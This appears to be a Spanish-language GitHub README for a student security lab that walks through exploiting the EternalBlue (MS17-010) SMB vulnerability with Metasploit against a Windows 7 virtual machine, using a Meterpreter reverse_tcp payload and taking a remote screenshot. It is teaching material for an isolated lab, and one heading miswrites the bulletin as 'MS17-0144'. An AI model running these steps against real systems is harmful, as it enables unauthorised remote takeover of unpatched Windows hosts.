Skip to content

fernandopaezmartin/SAD_2021--Metasploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

45 Commits
 
 
 
 
 
 

Repository files navigation

Video demostrativo

Video demostrativo

SAD_2021--Metasploit

Práctica del módulo de Seguridad y Alta Disponibilidad

  • Alumno: Fernando Páez Martín
  • Curso: 2ºB - A.S.I.R.
  • IES Punta del Verde

alt Metalogo

Haremos una busqueda de información sobre esta herramienta que permite ejecutar y desarrollar exploits contra sistemas objetivos. La primera opción antes de usar la propia herramienta va a consistir en recopilar información sobre el sistema objetivo. A partir de los datos obtenidos, se tomarán las decisiones acordes y los pasos a seguir en etapas posteriores.

  • Descarga de las herramientas de Metasploitable y Máquina Virtual de Kali linux.
  • Descarga de imagen iso de windows 7 para realizar el estudio de la vulnerabilidad y creacion de la máquina virtual.

Recopilación de información

La tarea a desarrollar irá enfocada a la vulnerabilidad catalogada en la base de datos de vulnerabilidades CVE como:

MS17-0144 - Eternalblue

EternalBlue explota una vulnerabilidad en protocolo Server Message Block (SMB). Esta vulnerabilidad se dio porque el servidor SMB v1 (SMBv1) de Microsoft Windows manejaba mal paquetes especialmente diseñados por atacantes remotos, permitiendo ejecutar código sobre el equipo a que ataca.

Configuración de las máquinas virtuales

Se configuran en un entorno llamado "Red Interna" y dentro del mismo rangode red:

  • Kali con 10.0.2.10/8

    Ip Kali

  • Windows con 10.0.2.11/8

    Ip Windows

  • Comprobamos que las dos máquinas tienen conectividad entre si haciendo ping entre ellas:

    Ping Windows

    Ping Kali

Ejecución de escaner de red Nmap

Con esta herramienta descubriremos puertos y servicios abiertos en la máquina objetivo.

msfconsole

Metasploit Framework (MSF)

En la primera fase ejecutaremos este framework para buscar exploits usar, descargar payloads y ejecutarlos.

msfconsole

msfconsole

Usaremos su buscador para encontrar el exploit:

search eternalblue

search msf

De los resultados elegiremos la primera opción:

0 exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

use 0

search msf

Nos devuelve:

No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

Vemos que parámetros son requeridos con el comando: options

options

nos pide datos del equipo remoto o RHOST. Le indicamos la ip del equipo remoto 10.0.2.11

set rhost

Podemos ver una serie de payloads a ejecutar:

varios payloads

Vamos a realizar la prueba con el siguiente windows/x64/meterpreter/reverse_tcp:

reverse_tcp

Le indicamos que se ejecute con run

run

Podemos ver las distintas opciones que nos ofrece este exploit con options

options

Como ejemplo ejecutaremos el comando screenshot y nos hará una captura de pantalla de la máquina remota.

screenshot

Mostramos la captura realizada:

screenshot2

About

Ejercicio sobre Metasploit en el Módulo de Seguridad y Alta Disponibilidad - Punta del Verde 2021/2022

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published